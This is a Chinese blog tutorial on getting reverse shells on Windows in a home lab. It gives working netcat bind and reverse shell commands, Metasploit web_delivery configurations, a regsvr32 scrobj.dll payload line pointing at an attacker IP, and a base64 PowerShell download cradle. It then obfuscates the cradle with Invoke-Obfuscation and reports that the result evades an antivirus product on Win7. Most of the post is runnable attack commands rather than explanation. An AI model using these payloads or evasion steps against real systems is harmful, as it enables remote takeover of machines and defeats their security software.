渗透测试-window反弹shell

已于 2023-01-20 10:34:27 修改
阅读量4.4k 收藏 21
点赞数 2
分类专栏: 渗透测试 文章标签: 安全性测试 web安全 安全 linux
于 2022-05-11 22:25:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lza20001103/article/details/124718313
版权

系列文章目录

文章目录

前言

前期我们大概总结了web渗透方面的各个漏洞的原理和利用方法,以及用实验给大家详细的讲解了,剩下的就是waf绕过原理和方法还没有讲解,在后期的文章中,我会陆续给大家总结一下waf绕过方法以及原理相关内容,这期文章我给大家主要讲解window上如何反弹shell,以及为什么要反弹shell,反弹shell的方法是什么,在后期也会介绍Linux反弹shell的方法给大家。这里我主要讲解几种常用的window反弹shell的方法给大家,内容有点多,请大家一定要仔细看完并勤加练习。

一、理解反弹shell

1.为什么需要反弹shell

当正向连接不可达时候

1.客户机中了木马,但是在局域网内,无法正向连接。
2.由于防火墙和局域网的限制,对方只能发送请求,不可主动接受请求

2.原理

反弹shell:控制端监听某个端口,被控制端发起请求到该端口,并将命令行的输入输出传到控制端

二.window反弹shell的几种方法

1.window正向和反向shell

1.正向shell

(1)环境搭建
win10,kali,nc工具(netcat)
(2)这里的工具大家可以从github下载,而且这个工具还要上传到对方的主机上,这又是一个技术,在后渗透过程中 ,我们也常常会接触到如何下载文件到对方主机上的操作,大家可以百度去搜索。
(3)所谓正向就是控制端去主动连接被控端,监听被控端打开的端口就可以了,这里就用nc工具来监听。

前提是要把工具下载到对方的主机上打开执行

分别打开他们的nc所在的目录运行nc.exe
被控端(win10):nc.exe -lvvp 6666 -e cmd.exe(win10)
控制端:nc 1921.68.222.4 6666(记住是被控的ip)(kali)
window打开
在这里插入图片描述
kali上监听
在这里插入图片描述
在这里插入图片描述
反弹shell成功
当我们需要看的更清楚的时候,我们可以修改一下编码
chcp 65001
在这里插入图片描述
实验成功。

2.反向shell

被控端(win10):nc.exe -e cmd.exe 192.168.222.131 6666(控制端的ip)
控制端:nc -lvvp 6666
所谓反向shell就是被控端将cmd.exe传送到控制端的监听端口上,主动连接控制端的端口
window打开执行
在这里插入图片描述
kali上监听
在这里插入图片描述
反弹shell成功。

2. regsvr.exe反弹shell

regsvr是window上自带的工具,可以直接打开使用,我们就使用它进行反弹shell
我们需要打开msf进行生成regsvr木马命令,到目标主机上执行
由于这个工具是用在web服务端的,所以我们要调用msf的web_delivery模块进行攻击,也就是前端代码script模块
前期就是设置一些模块的命令
use exploit/multi/script/web_delivery
set srvhost 192.168.222.131
set payload windows/x64/meterpreter/reverse_tcp
options
show targets
set target 3
set srvhost 192.168.222.131
set srvport 8080
set lhost 192.168.222.131
set lport 4444
exploit -j

这里解释一下set target 3是设置regsvr模块的
要设置什么,输入options查看就可以了
然后我们进行攻击exploit -j
在这里插入图片描述
这时就会返回一个木马命令
regsvr32 /s /n /u /i:http://192.168.222.131:8080/QIFom8ec4zaey.sct scrobj.dll
我们复制到win10上执行
在这里插入图片描述
再回到msf查看
发现返回了一个会话
在这里插入图片描述
sessions查看
set sessions 8
在这里插入图片描述
输入shell,反弹了shell
我们输入ipconfig看看
在这里插入图片描述
我们进行编码查看
chcp 65001
在这里插入图片描述
反弹shell成功。

3.powershell的几种工具和使用方法

powershell是一款十分强大的免杀工具,集成了多种免杀工具的使用,接下来给大家介绍最常用的powercat和Invoke-Obfuscation(代码混淆免杀工具)

1.powercat

我们打开msf的web_delivery模块,设置payload为window
我们设置一些命令,这里不在进行演示
powershell.exe
use exploit/multi/script/web_delivery
set srvhost 192.168.222.131
set srvport 8080
set lhost 192.168.222.131
set lport 7777
options
show targets
set target 2
set payload windows/x64/meterpreter/reverse_tcp
exploit -j
jobs
background(退出会话)

这里解释一下set target 2是设置了powershell(psh)模块
在这里插入图片描述
我们生成了powershell木马代码后,复制到win10执行,就可以返回会话了。
在这里插入图片描述
在kali查看一下
在这里插入图片描述
发现返回了会话
输入sessions查看,进入会话
在这里插入图片描述
我们输入shell,进行反弹shell
在这里插入图片描述
输入chcp 65001
查看编码后的shell,输入ipconfig
在这里插入图片描述
查看ip地址成功,反弹shell成功,实验结束。

2. Invoke-Obfuscation

Invoke-Obfuscation是一款代码混淆免杀工具,在低版本的win10和win7主机上是可以绕过杀软软件的。
(1)首先,window上是没有这个工具的,大家要自己在github下载
(2)找到这个工具的当前目录
cd Invoke-Obfuscation
输入powershell,进入ps中
在这里插入图片描述
Set-ExecutionPolicy Unrestricted(如果报错先执行这个)
输入这个加载模块
Import-Module .\Invoke-Obfuscation.psd1(在执行这个)
输入Invoke-Obfuscation(打开)
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
我们找一个没有进行编码过的powershell代码放入一个.ps1文件里
代码如下:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABiAF8ARgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ADsAaQBmACgAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUAByAG8AeAB5AF0AOgA6AEcAZQB0AEQAZQBmAGEAdQBsAHQAUAByAG8AeAB5ACgAKQAuAGEAZABkAHIAZQBzAHMAIAAtAG4AZQAgACQAbgB1AGwAbAApAHsAJABiAF8ARgAuAHAAcgBvAHgAeQA9AFsATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEcAZQB0AFMAeQBzAHQAZQBtAFcAZQBiAFAAcgBvAHgAeQAoACkAOwAkAGIAXwBGAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIAMgAyAC4AMQAzADEAOgA4ADAAOAAwAC8AWgBHAEYAcgA0AEcALwBXAFUAMQBuAFcAMABNAEQAZgAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIAMgAyAC4AMQAzADEAOgA4ADAAOAAwAC8AWgBHAEYAcgA0AEcAJwApACkAOwA=

放入1.ps1文件中
设置scriptpath,输入
set scriptpath D:\Invoke-Obfuscation\1.ps1
token
all\1
out 123.ps1(就会在当前的目录生成一个123.ps1文件)
在这里插入图片描述
//123.ps1
.(“{0}{1}{2}”-f’p’,‘owershell.ex’,‘e’) -nop -w (“{0}{1}”-f ‘hid’,‘den’) -e (“{10}{13}{8}{21}{15}{20}{12}{5}{18}{19}{25}{2}{11}{14}{17}{23}{16}{24}{1}{6}{9}{4}{0}{3}{22}{7}”-f ‘AC8AMQA5ADIALgAxADYAOAAuADIAMgAyAC4AMQAzADEAOgA4ADAAOAAwAC8AWgBHAEYAcgA0AEcALwBXAFUAMQBuAFcAMABNAEQAZgAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAG’,‘BiA’,‘CQAbgB1AGwAbAApAHsAJABiAF8ARgAuAHAAcgBvAHgAeQA9AFsATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEcAZQB0AFMAeQBzAHQAZQBtAFcAZQBiAFAAcgBvAHgAeQAoACkAOwAkAGIAXwBGAC4AUAByAG8AeA’,‘UAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIAMgAyAC4’,‘wAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAv’,‘AW’,‘GoAZQBjAHQAIABOAGUAdAAuAFcAZQBi’,‘EYAcgA0AEcAJwApACkAOwA=’,‘MAMQAyADsAJABiAF8ARgA9AG4AZQB’,‘AEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAG’,‘WwBOA’,‘B5AC4A’,‘BmACg’,‘GUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAH’,‘QwByAGUAZABlAG4AdABpAGEAbAB’,‘uAHcAZQBi’,‘BhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQw’,‘zAD0AWwBOAGUAdAAuAEMAcgBl’,‘wBTAHkAc’,‘wB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUAByAG8AeAB5AF0AOgA6AEcAZQB0AEQAZQBmAGEAdQBsAHQAUAByAG8AeAB5ACgAKQAuAGEAZABkAHI’,‘AGMAbABpAGUAbgB0ADsAaQ’,‘3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAA’,‘AMQAzADEAOgA4ADAAOAAwAC8AWgBHA’,‘AGQAZQBuAHQAaQ’,‘ByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0Abw’,‘AZQBzAHMAIAAtAG4AZQAgA’)

打开msf的script模块
use exploit/multi/script/web_delivery
set srvhost 192.168.222.131
set srvport 8080
set lhost 192.168.222.131
set lport 7777
options
show targets
set target 2
set payload windows/x64/meterpreter/reverse_tcp

这里的set target 2同样设置为powershell(psh)模块
在目标主机的终端,在当前文件路径下输入执行123.ps1文件(记得是123.ps1文件所在的目录执行)
输入powershell -f 123.ps1
就会在kali返回会话
在这里插入图片描述
我们返回了会话,接下来进行反弹shell
输入shell
在这里插入图片描述
输入chcp 65001
查看编码后的shell
在这里插入图片描述
我们可以测试一下是否可以绕过杀软软件
我测试了一下,由于我的win10的版本过高,无法绕过杀软工具
所以我用了win7进行了测试,我们打开火绒软件
这是没有进行编码后的代码
在这里插入图片描述
被杀掉了,我们看看编码后的123.ps1文件
在这里插入图片描述
发现没有被杀掉,实验成功。

总结

本次实验简单介绍了window上常用的几种免杀工具的使用方法,当我们无法进行正向连接shell的时候,就可以进行反向连接shell的方法进行测试,后期我会介绍在Linux上反弹shell的几种方法。

炫彩@之星
关注
  • 2
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
反弹shell小工具源码
10-12
依赖PHP环境。修改IP、端口,自动生成命令
Windows反弹Shell
qq_62073002的博客
04-26 851
正向shell: 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell(反弹shell)︰ 被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。靶机:win11攻击机:vps。
Invoke-Obfuscation:一款功能强大的PowerShell代码混淆工具
最新发布
2401_84466223的博客
06-22 565
Invoke-Obfuscation是一款功能强大的PowerShell代码混淆工具,该工具兼容PowerShell v2.0+,能够帮助广大研究人员对PowerShell命令和脚本代码进行混淆处理。
Windows的几种常用反弹shell方法
热门推荐
hackzkaq的博客
02-21 1万+
零基础学黑客,搜索公众号:白帽子左一 简介:shell类似于DOS下的COMMAND.COM和后来的cmd.exe,它接收用户命令,然后调用相应的应用程序,也可以通俗的说是命令执行环境。分为交互式shell,与非交互式shell。 交互shell就是shell等待你的输入,并且立即执行你提交的命令,这种模式被称作交互式是因为shell与用户进行交互。 非交互shell不会与用户进行交互,而是用户读取存放在文件中的命令或者输入的命令,并且执行它们。当它读到文件的结尾,shell也就终止了。 1.nc反弹sh
Windows 反弹shell方法
weixin_53747497的博客
07-12 2741
正向shell : 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell反弹shell):被控端主动发起连接请求去连接控制端,通常被控端 由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送 过来的数据包。
反弹Shell方法论,Windows
大河之犬的博客
10-10 825
使用它你可以轻易的建立任何连接。要创建Powershell反向Shell,黑客需要在目标系统上运行一个恶意的Powershell脚本,该脚本将与攻击者的服务器建立连接。Powershell反向Shell是一种常用的攻击技术,用于在目标系统上建立与攻击者控制的远程服务器之间的连接。Perl反向Shell是一种利用Perl编写的恶意脚本,用于建立与目标系统的反向连接。在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。
内网渗透之Windows反弹shell(一)
不知名白帽的博客
07-08 2021
内网渗透之Windows反弹shell(一)(反向shell简介、Windows反弹shell
react-window-grid:一个具有基于react-window同步的列和行标题的react网格
02-18
@ andrglo / react-window-grid 具有列和行标题的React网格,例如电子表格 在查看演示 安装 # Yarn yarn add react-window # NPM npm install --save react-window 用法 import { ReactWindowGrid } from '@...
fix-chrome-window-group-gnome-shell:用于在gnome-shell上修复Chrome窗口组的Shell脚本
05-12
修复chrome窗口组gnome外壳用于修复gnome-shell上的Chrome窗口组的Shell脚本安装运行此单行代码即可自动修复:$ wget -q ...chrome-window-group-gnome-shell.sh -O - | sh 如果权限被拒绝,请使用sudo:$ wget -q ...
docker-compose-window-2.14.2.exe
12-27
docker-compose-window-2.14.2.exe免费下载
01-window.html
02-15
01-window.html
electron-panel-window
03-09
电子面板窗口该fork或electronic-panel-window 在macOS big sur上工作(已测试)。 注意事项很少。titleBarStyle应该具有值'customButtonsOnHover' 这将在左上方显示两个按钮(以关闭和最大化窗口)。 您可以通过...
windows反弹shell复现
就是我的博客
04-06 1万+
windows反弹shell 简介: reverse shell反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell类似,本质上是网络概念的客户端与服务端的角色反转,就是让目标机执行反向连接攻击机。 在实战中多配置命令执行等漏洞进行使用。 环境: 攻击机:IP为192.168.1.111,系统信息 Linux kali 5.10.0-kali3-amd6...
Window下的反弹shell
qq_58000413的博客
05-05 1188
什么是正向shell?正向shell:控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell:被控制端主动发起连接去请求连接控制,通常被控端由于防火墙受限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。
【工具分享】-反弹Shell在线编写工具
一只爱吃橙子的羊
04-18 2005
反弹Shell在线编写工具(可以作为离线版)
Windows反弹shell的方式
ws1813004226的博客
05-25 6086
一、Windows反弹shell 1.nc反弹 (1)我们先在被控制主机下载netcat。netcat下载 (2)cmd下打开下载目录,输入: nc 192.168.59.131 9999 -e C:\Users\21124\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\cmd.exe(本机cmd文件路径) (3)可以看到shell反弹回来的,但是可能由于防火墙的原因,控制极其不稳定。 2.msf反弹 (1)
windows 反弹shell_原创干货 | windows反弹shell小结
weixin_39533896的博客
11-19 1135
前言本文是att&ck Command-Line Interface的展开篇平时遇到rce的漏洞,我们通常会弹一个shell给自己,(提权,内网渗透,搭建跳板,等等)linux反弹shell得益于命令行特别友好,所以我们可以非常简单地就可以把shell弹出来,比如使用bash,perl,python,nc,获得shell的原理其实就是建立了一个socket通道,那么今天我们来看看...
反弹shell的各种姿势(linuxwindows
weixin_42478365的博客
06-19 1070
在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。 反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。所有姿势整理自网络,假设,攻击者主机为:192.168.99.242,本地监听1234端口,如有特殊情况以下会备注说明。 Linux 反弹shell 姿势一:bash反弹 bash -i >& /dev/tcp/192.168.99.242/1234 0>&1 base64版:bash -
windows 反弹shell_反弹shell的各种姿势
weixin_39800331的博客
11-27 428
来自公众号:Bypass在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。本文所有姿势整理自网络,并基于同一个假设的前提下完成测试和验证。(假设:攻击者主机为:192.168.99.242,本地监听1234端口,如有特殊情况以下会备注说明。)Linu...
uniapp的--window-top
06-09
uniapp的--window-top是一个自定义组件的属性,用于设置组件的位置。它的取值范围是一个字符串,可以是像素值(px)、百分比(%)等单位,也可以是auto或inherit等关键字。当设置为像素值时,组件的位置就是距离容器顶部的像素数;当设置为百分比时,组件的位置就是相对于容器高度的百分比。如果设置为auto,则表示由浏览器自动计算位置;如果设置为inherit,则表示继承容器的位置属性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值